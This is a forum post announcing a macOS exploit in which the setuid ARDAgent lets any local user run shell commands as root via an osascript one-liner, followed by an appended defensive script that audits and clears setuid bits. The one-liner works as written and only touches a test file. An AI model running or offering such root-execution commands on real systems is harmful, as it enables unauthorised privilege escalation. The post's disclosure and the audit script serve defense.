What a way to start this forum. This exploit is starting to hit the news sites.

As a non-privileged user you can do this kind of thing exploiting the remote desktop agent:

osascript -e 'tell app "ARDAgent" to do shell script "touch /bin/foobar"'

And then with "ls -l /bin/foobar" you can see that you've written to /bin and created a file owned by root. Try:

rm /bin/foobar

and it'll fail: you need to use sudo. Turns out that the ARDAgent (/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ardagent) has the setuid bit set, where it shouldn't be. So the fix is trivial, just a chmod away.

This is a local exploit and needs physical access. So you know, they could just copy all your files to a USB stick and walk off.

Not every day we see an exploit for the Mac. OK, on to more productive posts!
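
Added example (not part of the original post): a defender-side check for the condition described above, a setuid bit on a binary that should not have one. The function names and the allowlist file are assumptions of this example, and `chmod u-s` is this example's choice for the chmod the post alludes to.

```shell
#!/bin/sh
# Audit a directory tree for setuid files that are not on an allowlist,
# and clear the setuid bit on a file that should not carry it.

# List regular files under DIR ($1) that have the setuid bit (mode 4000) set.
find_setuid() {
    find "$1" -type f -perm -4000 2>/dev/null
}

# Print setuid files under DIR ($1) that are NOT listed in ALLOWLIST ($2).
# ALLOWLIST is a hypothetical text file with one full path per line naming
# the binaries you expect to be setuid on this system.
unexpected_setuid() {
    find_setuid "$1" | while IFS= read -r path; do
        # -x: whole-line match, -F: fixed string, so paths are compared literally
        grep -qxF -- "$path" "$2" || printf '%s\n' "$path"
    done
}

# Clear the setuid bit on FILE ($1) and confirm that it is gone.
# Returns 0 if the bit is absent afterwards, non-zero otherwise.
clear_setuid() {
    [ -u "$1" ] || return 0          # nothing to do
    chmod u-s "$1" && [ ! -u "$1" ]
}

# Stand-alone use: sh audit.sh DIR ALLOWLIST
if [ "$#" -eq 2 ]; then
    unexpected_setuid "$1" "$2"
fi
```

Run against /System/Library/CoreServices with an allowlist that omits the ardagent path from the post, the audit would report that binary if its setuid bit is set; clearing the bit on a root-owned file requires sudo.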